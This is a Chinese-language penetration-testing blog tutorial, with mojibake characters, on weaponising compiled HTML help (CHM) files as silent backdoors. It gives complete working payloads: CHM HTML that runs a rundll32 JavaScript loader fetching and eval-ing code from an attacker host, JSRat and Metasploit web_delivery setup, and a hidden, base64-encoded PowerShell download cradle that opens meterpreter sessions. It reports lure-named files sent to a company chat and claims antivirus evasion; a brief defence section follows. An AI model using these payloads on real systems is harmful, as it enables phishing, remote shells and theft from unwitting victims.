0x00 簡(jiǎn)介

之前寫(xiě)過(guò)一篇關(guān)于客戶端釣魚(yú)的文章：《使用powershell Client進(jìn)行有效釣魚(yú)》中，在使用各個(gè)Client進(jìn)行測(cè)試的過(guò)程中，個(gè)人發(fā)現(xiàn)CHM文件是最好用的一個(gè)，但是其缺點(diǎn)就是會(huì)彈黑框，這樣就會(huì)讓被攻擊者察覺(jué)。那么怎么讓他不彈黑框呢?那就是本文要介紹的內(nèi)容啦~

[[164849]]

0x01 CHM 簡(jiǎn)介

在介紹怎么使用CHM來(lái)作為后門(mén)之前，首先要知道CMH是什么東西。

CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式，利用HTML作源文，把幫助內(nèi)容以類(lèi)似數(shù)據(jù)庫(kù)的形式編譯儲(chǔ)存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見(jiàn)圖形文件(GIF、JPEG、PNG)、音頻視頻文件(MID、WAV、AVI)等等，并可以通過(guò)URL與Internet聯(lián)系在一起。因?yàn)槭褂梅奖?，形式多樣也被采用作為電子?shū)的格式。

0x02 CHM 制作

CHM的制作方法很多。有多款工具可以使用，這里就不在做詳細(xì)的介紹了。本次測(cè)試使用了EasyCHM來(lái)制作CHM文件，使用起來(lái)非常簡(jiǎn)單。

新建如下目錄，文件內(nèi)容隨意：

打開(kāi)EasyCHM，新建->瀏覽。選擇該目錄。默認(rèn)文件類(lèi)型：

點(diǎn)擊確認(rèn)，即可看到預(yù)覽的CHM文件：

選擇編譯，即可編譯成CHM文件。

0x03 CHM Execute Command

14年的時(shí)候@ithurricanept 在twitter上發(fā)了一個(gè)demo，通過(guò)CHM運(yùn)行計(jì)算器：

利用代碼如下：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> 
command exec   
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 
<PARAM name="Command" value="ShortCut"> 
 <PARAM name="Button" value="Bitmap::shortcut"> 
 <PARAM name="Item1" value=',calc.exe'> 
 <PARAM name="Item2" value="273,1,1"> 
</OBJECT> 
<SCRIPT> 
x.Click();  
</SCRIPT> 
</body></html> 

將以上代碼寫(xiě)入html，置于工程目錄進(jìn)行編譯，生成CHM文件，運(yùn)行此文件，彈出計(jì)算器：

 0x04 去除彈框

有測(cè)試過(guò)nishang Out-CHM 的同學(xué)會(huì)發(fā)現(xiàn)，運(yùn)行生成的CHM文件的時(shí)候會(huì)看到明顯的彈框。就像這樣:

某個(gè)晚上突然腦洞了一下，想到了一個(gè)好的方式來(lái)讓他不顯示彈框，即結(jié)合使用JavaScript Backdoor。經(jīng)過(guò)測(cè)試，成功實(shí)現(xiàn)在不彈框的情況下獲取meterpreter會(huì)話，此次測(cè)試使用一個(gè)我修改過(guò)的python版 JSRat.ps1 ，地址為：MyJSRat。使用方式詳見(jiàn) readme。

以下為完整的測(cè)試過(guò)程：

1、結(jié)合CHM + JSBackdoor

使用交互模式的JSRat server：

python MyJSRat.py -i 192.168.1.101 -p 8080 

python MyJSRat.py -i 192.168.1.101 -p 8080

訪問(wèn) http://192.168.1.101:8080/wtf 獲取攻擊代碼如下：

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);} 

經(jīng)過(guò)多次測(cè)試，成功將以上命令寫(xiě)入chm，其Html代碼為：

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> 
This is a demo ! <br> 
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> 
<PARAM name="Command" value="ShortCut"> 
 <PARAM name="Button" value="Bitmap::shortcut"> 
 <PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'> 
 <PARAM name="Item2" value="273,1,1"> 
</OBJECT> 
<SCRIPT> 
x.Click();  
</SCRIPT> 
</body></html> 

編譯以后運(yùn)行，可以成功獲取JS交互shell:

直接執(zhí)行cmd /c command 是會(huì)有黑框的，可以使用run來(lái)避免顯示黑框。執(zhí)行run以后，輸入 whoami > e:\1.txt 之后通過(guò)read 來(lái)獲取回顯。

2、獲取meterpreter會(huì)話

此次測(cè)試獲取meterpreter會(huì)話的方式是通過(guò)執(zhí)行powershell命令，直接獲取，當(dāng)獲取客戶端JS 交互shell之后自動(dòng)執(zhí)行powershell命令，獲取meterpreter會(huì)話。具體操作如下：

開(kāi)啟MSF web_delivery：

~  msfconsole -Lq  
msf > use exploit/multi/script/web_delivery  
msf exploit(web_delivery) > set target 2  
target => 2  
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
msf exploit(web_delivery) > set lhost 192.168.1.101  
lhost => 192.168.1.101  
msf exploit(web_delivery) > set lport 6666  
lport => 6666  
msf exploit(web_delivery) > set SRVPORT 8081  
SRVPORT => 8081  
msf exploit(web_delivery) > set uripath /  
uripath => /  
msf exploit(web_delivery) > exploit  
[*] Exploit running as background job.  
msf exploit(web_delivery) > 
[*] Started reverse TCP handler on 192.168.1.101:6666  
[*] Using URL: http://0.0.0.0:8081/  
[*] Local IP: http://192.168.1.101:8081/  
[*] Server started.  
[*] Run the following command on the target machine:  
powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/'); 

裝有powershell的客戶端執(zhí)行以下命令則可獲取meterpreter會(huì)話：

powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/'); 

由于存在特殊字符，我們可以把以上代碼編碼為base64格式，將以下代碼存入power.txt

$n=new-object net.webclient;  
$n.proxy=[Net.WebRequest]::GetSystemWebProxy();  
$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;  
IEX $n.downloadstring('http://192.168.1.101:8081/'); 

執(zhí)行以下命令：

cat power.txt | iconv --to-code UTF-16LE |base64 

最終要執(zhí)行的powershell命令為：

powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA== 

使用執(zhí)行命令模式直接獲取meterpreter會(huì)話：

python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==" 

測(cè)試過(guò)程中，從運(yùn)行CHM到獲取meterpreter，客戶端無(wú)明顯異常，全程無(wú)黑框彈出，獲取到meterpreter會(huì)話如下圖：

3、是否被殺?

可能很多人會(huì)問(wèn)，會(huì)不會(huì)被殺，下面是virscan的查殺結(jié)果：

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

0x05 利用場(chǎng)景

一張圖說(shuō)明(讓我猜猜你會(huì)不會(huì)點(diǎn))：

注: 隨便找了幾個(gè)漏洞利用工具修改了文件名，并不代表原作者分享的工具有問(wèn)題。

0x06 實(shí)際測(cè)試

是用上述方式制作chm文件，命名為一個(gè)比較有吸引力的名字，比如在公司技術(shù)群發(fā)了一個(gè)名字為"制作免殺后門(mén).chm"的文件，實(shí)際測(cè)試結(jié)果如下圖：

成功獲取多個(gè)人的meterpreter會(huì)話。

0x07 防御

目前我還沒(méi)查到什么防御的姿勢(shì)，知道的小伙伴可以分享一下。最好就是提高個(gè)人安全意識(shí)，對(duì)于這類(lèi)文件，多注意一下，盡量別亂點(diǎn)，如果非要點(diǎn)，可以放到虛擬機(jī)里面。使用procexp.exe可以看到存在后門(mén)的chm文件會(huì)開(kāi)啟新的進(jìn)程：

對(duì)于碰到這種后門(mén)，怎么溯源呢，其實(shí)也很簡(jiǎn)單，chm是可以反編譯為html的。 使用windows自帶的hh.exe 則可進(jìn)行反編譯。命令如下：

C:\Users\evi1cg\Desktop>hh -decompile test poc.chm #test 為當(dāng)前目錄的test文件夾

執(zhí)行結(jié)果如下：

0x08 小結(jié)

此次測(cè)試就是對(duì)一些已知的攻擊手法進(jìn)行結(jié)合，結(jié)果是讓此捆綁后門(mén)更加隱蔽，近乎“完美”，美中不足的是在文件開(kāi)啟的時(shí)候會(huì)出現(xiàn)短暫的卡頓。有時(shí)候小漏洞結(jié)合起來(lái)能造成大危害，小手法結(jié)合起來(lái)也能成大殺器。本著分享的精神將此姿勢(shì)介紹，希望小伙伴們能免受其害。

0x09 參考

https://twitter.com/ithurricanept/status/534993743196090368

https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1

http://drops.wooyun.org/tips/11764

https://github.com/samratashok/nishang